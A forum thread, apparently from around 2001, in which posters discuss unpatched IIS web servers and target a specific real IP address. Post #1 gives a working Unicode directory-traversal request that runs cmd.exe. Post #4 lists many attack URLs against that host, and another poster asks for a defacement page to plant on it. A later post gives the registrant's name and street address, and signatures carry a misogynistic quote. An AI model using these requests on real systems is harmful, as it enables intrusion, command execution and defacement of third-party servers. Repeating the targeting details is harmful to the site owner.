k12.us
Page 1 of 2 12 LastLast
Results 1 to 10 of 16

Thread: k12.us

  1. #1
    Banned
    Join Date
    Oct 2001
    Posts
    1,462

    Post k12.us

    I finally figured out why all these school website get hacked everyday.. The have at least 20-30 IIS exploits each... I found one (216.247.78.24) that lets you execute arbitary code ont heir system... Just conncect to port 80 and send this command:
    Code:
    GET /_vti_bin/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe
    Its pathetic... Im informing them of these exploits today I can barely contain myself

  2. #2
    Priapistic Monk KorpDeath's Avatar
    Join Date
    Dec 2001
    Posts
    2,628
    So most IIS web servers have exploits? Tell me it ain't true. No. That can't be.......enoguh sarcasm?

    I've trapped about 200 code-red and Nimda infected servers in my tarpit. You'd think when the performance of their web servers degrades enough that they would wake up and figure out that they are infected but NOOOOOOO.
    Mankind have a great aversion to intellectual labor; but even supposing knowledge to be easily attainable, more people would be content to be ignorant than would take even a little trouble to acquire it.
    - Samuel Johnson

  3. #3
    Senior Member
    Join Date
    Nov 2001
    Posts
    4,786
    does anybody know of an ftp site that has a good defacement page that can be transfered to these turkeys?
    Something like "this site is infected with the nimda virus...stay away!
    thank you.
    the center for disease control"

    It might be the only way to get through to them.
    Bukhari:V3B48N826 “The Prophet said, ‘Isn’t the witness of a woman equal to half of that of a man?’ The women said, ‘Yes.’ He said, ‘This is because of the deficiency of a woman’s mind.’”

  4. #4
    Banned
    Join Date
    Oct 2001
    Posts
    1,462
    Ill look into that for you Tedob1... But for now check out the rest of the exploits I found on this server.. BTW This site has been hacked during the time we were posting to this thread....I think...lol(216.247.78.24)All the 'bugs' are for port 80 unless otherwise stated.... If you need any help using them.... Dont ask.. Look around or just look up

    ---DISCLAIMER---I am NOT responsible for what you do with these bugs---DISCLAIMER---

    http://216.247.78.24/_vti_inf.html
    http://216.247.78.24/_vti_log
    http://216.247.78.24/_vti_log/author.log
    http://216.247.78.24/global.asa
    http://216.247.78.24/postinfo.html
    http://216.247.78.24/cgi-bin
    http://216.247.78.24/_vti_bin
    http://216.247.78.24/_vti_bin/..%c0%...2/ipconfig.exe
    http://216.247.78.24/_vti_bin/_vti_adm/admin.dll
    http://216.247.78.24/_vti_bin/_vti_aut/author.dll
    http://216.247.78.24/_vti_bin/shtml.dll
    http://216.247.78.24/_vti_bin/shtml.dll/_vti_rpc
    http://216.247.78.24/_vti_bin/shtml.dll/guest.htm
    http://216.247.78.24/_vti_bin/shtml.dll/nosuch.htm
    http://216.247.78.24/_vti_bin/shtml.dll/tstt.htm

  5. #5
    Senior Member
    Join Date
    Dec 2001
    Posts
    884
    lol, that is so horrible.

  6. #6
    Banned
    Join Date
    Oct 2001
    Posts
    1,462
    Pathetic isnt it.... Just shows you what Micro$oft is capable of

  7. #7
    Banned
    Join Date
    Oct 2001
    Posts
    1,462
    I especially like the ipconfig bug... Look at how many ips the box is bounded to... LOL One Kiddiot could take down the whole k12.us network with a well-orginized DDoS attack....

  8. #8
    Member
    Join Date
    Dec 2001
    Posts
    75
    and someone hacked it, u shouldn't of listed all taht here but, that was one of my 1st hacks(not that site it was a Jr High in Canada i think).....




    -Guerrilla Se7en

  9. #9
    Senior Member
    Join Date
    Nov 2001
    Posts
    4,786
    your right about the hole, but its not its not a school.
    Man these guys are so lame i could use my own ftp server and get away with it.
    if i were inclined to do such things.

    24.78.247.216.in-addr.arpa PTR (Pointer) cmsspeedtoys.com

    Registrant:
    Speedtoys (CMSSPEEDTOYS-DOM)
    20 CHERRY LANE
    MAHOPAC, NY 10541
    US

    Ping Results: 216.247.78.24 210 ms (id= 1, seq= 1)
    IIS Status : Traversal Unpatched Worm Infected CodeRed
    Error Enumerating Shares. The operation completed successfully.
    Bukhari:V3B48N826 “The Prophet said, ‘Isn’t the witness of a woman equal to half of that of a man?’ The women said, ‘Yes.’ He said, ‘This is because of the deficiency of a woman’s mind.’”

  10. #10
    Senior Member
    Join Date
    Nov 2001
    Posts
    4,786
    oh ****! i just saw your post with the disclaimer
    Bukhari:V3B48N826 “The Prophet said, ‘Isn’t the witness of a woman equal to half of that of a man?’ The women said, ‘Yes.’ He said, ‘This is because of the deficiency of a woman’s mind.’”

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •